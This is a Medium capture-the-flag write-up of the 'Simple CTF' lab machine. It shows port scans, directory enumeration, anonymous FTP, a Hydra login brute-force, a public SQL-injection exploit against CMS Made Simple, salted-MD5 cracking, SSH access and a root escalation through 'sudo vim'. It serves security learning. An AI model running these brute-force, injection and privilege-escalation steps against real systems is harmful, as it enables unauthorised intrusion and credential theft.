Simple CTF

✔️ INFORMATION GATHERING

rustscan :

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.74.102 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.74.102:80
Open 10.10.74.102:2222
Open 10.10.74.102:21
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 00:54 EST
Initiating Ping Scan at 00:54
Scanning 10.10.74.102 [4 ports]
Completed Ping Scan at 00:54, 0.50s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:54
Completed Parallel DNS resolution of 1 host. at 00:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 00:54
Scanning 10.10.74.102 [3 ports]
Discovered open port 2222/tcp on 10.10.74.102
Discovered open port 80/tcp on 10.10.74.102
Completed SYN Stealth Scan at 00:54, 7.64s elapsed (3 total ports)
Nmap scan report for 10.10.74.102
Host is up, received echo-reply ttl 61 (0.45s latency).
Scanned at 2021-11-10 00:54:15 EST for 8s
PORT STATE SERVICE REASON
21/tcp filtered ftp no-response
80/tcp open http syn-ack ttl 61
2222/tcp open EtherNetIP-1 syn-ack ttl 61
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
Raw packets sent: 11 (460B) | Rcvd: 3 (116B)

open ports :

  • 21 : FTP
  • 80: HTTP
  • 2222: EtherNetIp-1

nmap :

┌──(root💀kali)-[~]
└─# nmap 10.10.74.102 -sV -p80,21,2222
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 01:48 EST
Nmap scan report for 10.10.74.102
Host is up (0.39s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.82 seconds

port 80

web server at port 80
source code
┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 01:24:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 300]
/simple (Status: 301) [Size: 313] [--> http://10.10.74.102/simple/]

===============================================================
2021/11/10 01:25:13 Finished
===============================================================
/simple
cms(cms made simple) framework version number
┌──(root💀kali)-[~]
└─# searchsploit "cms made simple 2.2.8"
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root):
530 This FTP server is anonymous only.
Login failed.
ftp>
┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.80 secs (0.2035 kB/s)
ftp>
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
ForMitch.txt (END)
robots.txt
┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102/simple -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102/simple
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 02:00:47 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 303]
/.htpasswd (Status: 403) [Size: 303]
/admin (Status: 301) [Size: 319] [--> http://10.10.74.102/simple/admin/]
/assets (Status: 301) [Size: 320] [--> http://10.10.74.102/simple/assets/]
/doc (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/doc/]
/index.php (Status: 200) [Size: 19913]
/lib (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/lib/]
/modules (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/modules/]
/tmp (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/tmp/]
/uploads (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/uploads/]

===============================================================
2021/11/10 02:01:34 Finished
===============================================================
cms admin
capturing the request
┌──(root💀kali)-[~]
└─# hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.190.16 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect" -t 50
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 17:47:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking http-post-form://10.10.190.16:80/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect
[80][http-post-form] host: 10.10.190.16 login: mitch password: secret
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-10 17:47:40
┌──(root💀kali)-[~]
└─# searchsploit -m php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/46635.py

✔️ EXPLOITATION

i will rename to cms-sql-exploit.py
and now run our exploit

┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
File "/root/cms-sql-exploit.py", line 25
print "[+] Specify an url target"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[+] Specify an url target")?
2to3 -w cms-sql-exploit.py
  • w is for write changes.
┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py -u http://10.10.104.126/simple --crack -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 1dajXcz
[+] Username found: ji
[+] Email found: adv
[+] Password found: 0c01sf
[*] Try: 000000
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[*] Try: 0c01f4468bd75d7a84c7eb73846e8d96$
[*] Now try to crack password
Traceback (most recent call last):
File "/root/cms-sql-exploit.py", line 184, in <module>
crack_password()
File "/root/cms-sql-exploit.py", line 53, in crack_password
for line in dict.readlines():
File "/usr/lib/python3.9/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 933: invalid continuation byte
┌──(root💀kali)-[~]
└─# hashid
0c01f4468bd75d7a84c7eb73846e8d96
Analyzing '0c01f4468bd75d7a84c7eb73846e8d96'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
┌──(root💀kali)-[~]
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0c01f4468bd75d7a84c7eb73846e8d96

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
C:\Users\szero\Desktop\hashcat-6.2.4>hashcat.exe --help | findstr md5
70 | md5(utf16le($pass)) | Raw Hash
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
hascat example
hascat64.exe -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt
hacat64.exe -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
┌──(root💀kali)-[~]
└─# ssh mitch@10.10.24.159 -p 2222
The authenticity of host '[10.10.24.159]:2222 ([10.10.24.159]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.24.159]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.24.159's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!
$ ls
user.txt
$ cd ..
$ ls
mitch sunbath

✔️ privilege escalation

manual enumeration:

-sh: 8: cd: can't cd to sunbath
$ find / -type f -user root -perm /4000 2>/dev/null
/bin/su
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/fusermount
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
$
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/sh'
$ sudo  vim -c ":!/bin/bash"root@Machine:/home#
root@Machine:/# cd root/
root@Machine:/root# cat root.txt
*********************
root@Machine:/root#

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Surya Dev Singh

Surya Dev Singh

enthusiast cyber security learner and penetration tester / ethical hacker , python programmer and in my free time you will find me solving CTFs